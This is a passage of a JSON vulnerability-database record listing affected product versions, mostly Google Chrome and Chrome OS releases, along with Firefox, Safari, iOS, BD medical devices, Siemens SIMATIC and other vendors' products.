        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.663.0"
      },
      {
        "_id": null,
        "model": "pyxis ciisafe -workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.537.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1275.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.133"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.96"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1046.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.122"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1062"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.934.0"
      },
      {
        "_id": null,
        "model": "simatic hmi basic panels 2nd generation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.928.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.490.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1020"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.469.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1080.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.67"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.4"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "11.2.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.951.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.130"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.414.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.52"
      },
      {
        "_id": null,
        "model": "unified computing system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "cisco",
        "version": "3.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.332"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.2.3"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.85"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.108"
      },
      {
        "_id": null,
        "model": "simatic field pg m4",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.115"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.18"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.688.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1050.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.479.0"
      },
      {
        "_id": null,
        "model": "pyxis parx handheld",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.960.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.838.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.394.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.41"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.718.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.503.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.890.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1057.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "41.0.2272.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.528.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "12.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.25"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.78"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.61"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1676.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.100"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.62"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.2491064"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.33"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.105"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1023.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.325.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1010.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.724.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.335.4"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.1.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.431.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.498.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.51"
      },
      {
        "_id": null,
        "model": "facscalibur",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.3"
      },
      {
        "_id": null,
        "model": "facscanto 10-color clinical",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.406.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.938.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.515.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1294.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.36"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.6"
      },
      {
        "_id": null,
        "model": "viper xtr",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.55"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.4"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.445.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.409.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.68"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.4"
      },
      {
        "_id": null,
        "model": "android",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.315.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.119"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.54"
      },
      {
        "_id": null,
        "model": "enterprise linux for power little endian",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "_id": null,
        "model": "facsaria i/ii/iii",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.741.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.27"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.170.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.588.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.59"
      },
      {
        "_id": null,
        "model": "windows server for x64-based systems sp2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "2008"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.3"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "41.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1045.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.799.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.511.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.104"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1073.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.152"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.792.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "24.1.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.35"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.9"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "43.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1667.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.322"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.33"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1279.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.87"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.169.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.272.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.97"
      },
      {
        "_id": null,
        "model": "pyxis medstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "35000"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.411.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.103"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.47"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.223.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.367.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1016"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1045"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.112"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.106"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.634.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.454.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.79"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.1.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.53"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1029.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.7"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.5"
      },
      {
        "_id": null,
